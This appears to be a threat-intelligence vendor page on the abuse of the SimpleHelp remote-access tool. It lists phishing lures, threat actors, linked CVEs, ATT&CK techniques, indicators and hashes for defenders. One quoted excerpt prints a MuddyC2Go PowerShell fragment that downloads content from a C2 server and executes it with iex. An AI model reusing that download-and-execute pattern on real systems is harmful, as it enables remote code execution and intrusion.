SimpleHelp is a legitimate remote monitoring and management (RMM) / remote access tool that is repeatedly described in the provided content as being abused by threat actors as a stealthy remote access trojan and persistence mechanism. Across the reporting, it is used to provide interactive remote control, persistent access, file transfer, script execution, and post-compromise operator access, often after initial intrusion by phishing, exploitation of public-facing vulnerabilities, or use of other remote tools.
Observed delivery and abuse patterns in the content include phishing campaigns using invitation-themed lures, tax- and IRS-themed lures, DocuSign/Adobe Sign/Zoom impersonation, CPA-themed messages, and blockchain/project-documentation lures. Delivered filenames and artifacts mentioned include Ecard9140.exe, IRS-doc.msi, Adobe.ClientSetup.exe, Remote Access.exe, TranscriptViewer5.1.exe, ftpdd32.exe installing a JWrapper-wrapped SimpleHelp client, OneDriveUpdater.exe installing a SimpleHelp client, and vhost.exe used in intrusions alongside Net Monitor for Employees. The content repeatedly notes abuse of JWrapper-wrapped SimpleHelp, including network paths such as /access/JWrapper-Remote%20Access-version.txt and the User-Agent JWrapperDownloader. SimpleHelp binaries are described as portable/self-contained, often embedding configuration internally, and commonly spawning a child process named remote access.exe.
Threat actors and clusters associated with SimpleHelp abuse in the content include the Medusa ransomware group and affiliate Storm-1175, MuddyWater / TA450, KONNI, Iranian threat actors more broadly, and cybercriminal clusters targeting trucking and logistics firms for cargo theft. It is also described as being chained with other RMM tools such as Net Monitor for Employees, ScreenConnect, Atera, PDQ Connect, MeshAgent, Fleetdeck, N-able, LogMeIn Resolve, and RemoteUtilities. In multiple cases, SimpleHelp is explicitly used for persistence after initial access, including after exploitation of FortiClient EMS CVE-2023-48788 and GoAnywhere MFT CVE-2025-10035.
Targeting described in the content spans Windows environments and broad victim sectors including financial services, healthcare, education, retail, manufacturing, technology, accounting and tax preparation, trucking and logistics, cryptocurrency and blockchain-related organizations, and Israeli targets in MuddyWater activity. The content also notes use by Iranian threat actors and North Korea-linked KONNI campaigns.
High-confidence indicators and infrastructure directly mentioned in the content include klmgskmtn[.]com, 124.198.131.250, 160.191.182[.]41, dronemaker[.]org, telesupportgroup[.]com, microuptime[.]com, 192.144.34[.]42, 192.144.34[.]35, and MuddyWater-associated SimpleHelp server IPs 146.70.149[.]61, 146.70.124[.]102, 37.120.237[.]204, and 37.120.237[.]248. File hashes directly listed include MD5 1c6770917d13fce1347f0cea9c9b86b0 for a Linux SimpleHelp-related binary, MD5 ee3b46f7cf3e9c5f2d914219ea0638ab / SHA256 fb165ff21d772cd7a2a4b0bb040f0ef88e99c5d40f49ceb74b5047f13413f044 for Adobe.ClientSetup.exe, and MD5 aa2774f7350c37577293f64fd6608822 / SHA256 77b8f597b7d20d4f7ae84caa5c22b94a8d9e09051f7cdaa17f41890ccf8c77a2 for Remote Access.exe.
Overall, the content characterizes SimpleHelp as a legitimate RMM platform that has been increasingly abused by both state-linked and financially motivated actors for stealthy remote access, persistence, post-exploitation control, and as part of ransomware and espionage intrusion chains.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
4 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2025-31161 is a 9.8 CVSS critical severity vulnerability that affects how the CrushFTP file transfer application handles user authentication... CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability in the S3 authorization header processing that allows authentication bypass.
Initial Access Exploitation of React2Shell (CVE-2025-55182) against crypto staking platforms... We observed this threat actor perform mass scanning to identify targets vulnerable to React2Shell...
“the Cofense Phishing Defense Center (PDC) identified multiple samples using the SimpleHelp Remote Monitoring and Management (RMM) tool… JWrapper-wrapped SimpleHelp is increasingly abused by threat actors as a stealthy Remote Access Trojan (RAT).”
Arctic Wolf has issued a warning regarding CVE-2026-1731, a nearly maximum-severity flaw (CVSS 9.9) in self-hosted BeyondTrust Remote Support and Privileged Remote Access environments... allows unauthenticated attackers to execute operating system commands... added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog... threat actors using the exploit to deploy SimpleHelp...
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
...TA450 historically using several RMM tools, such as Atera, PDQ Connect, ScreenConnect, and SimpleHelp...
"To maintain persistence, they abused remote monitoring and management (RMM) tools, specifically SimpleHelp and MeshAgent."
23 distinct techniques documented for this family, organized by ATT&CK tactic.
self-hosted RMM-серверы, которые атакующие разворачивают на VPS (T1583.003 - Virtual Private Server, Resource Development)
T1078 (Valid Accounts) - атакующий использует trial или free аккаунт вендора как валидную учётную запись
the host held a seven-tool remote monitoring and management (RMM) arsenal for persistence, including ScreenConnect and SimpleHelp
T1190 — Exploit Public-Facing Application (Initial Access)
The attackers also used some typical commands related to the Impacket WMIExec hacktool... During that intrusion, it’s believed the attackers used WMI to launch the SimpleHelp installer on the victim network.
T1078 (Valid Accounts) - атакующий использует trial или free аккаунт вендора как валидную учётную запись
MITRE ATT&CK Matrix Technique ID Technique Name Observed Behavior T1134.001 Access Token Manipulation: Token Impersonation winlogon.exe token theft via session_win.exe
MITRE ATT&CK Matrix Technique ID Technique Name Observed Behavior T1027 Obfuscated Files or Information Hex-encoded C2 config in JWrapper launch properties
Even when the file is renamed to something like party_invite.exe , or Voicemailaudioext.exe ... A common lure is themed as a Social Security statement ( ssa.msi ) ... using lures such as a document ( docmentfilecsm_jw98evavuqm5gb3.exe ) or an IRS tax-related file ( IRS-Statement_Pr2ui4J9cfA6YEu.exe ).
The MuddyC2Go launcher executed the following PowerShell code to connect to its command-and-control (C&C) server... Invoke-WebRequest -Uri $uri -Method GET ... iex $response.Content;
52 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
18 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A self-contained remote access tool abused in phishing campaigns, especially invitation-themed lures. Its binaries embed configuration internally and often spawn a child process for the remote access session.
A legitimate remote monitoring and management tool increasingly abused by threat actors for remote access in phishing campaigns.
Legitimate remote monitoring/management (RMM) tool observed as an unrelated artifact within exfiltrated source-code/open-directory materials from a previously exploited webserver.
A legitimate remote support/RMM tool that is being weaponized as a remote access capability. Delivered via phishing and installed silently for long-term access; observed modifying firewall rules to allow inbound connections and communicating with attacker-controlled infrastructure for profiles/C2.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.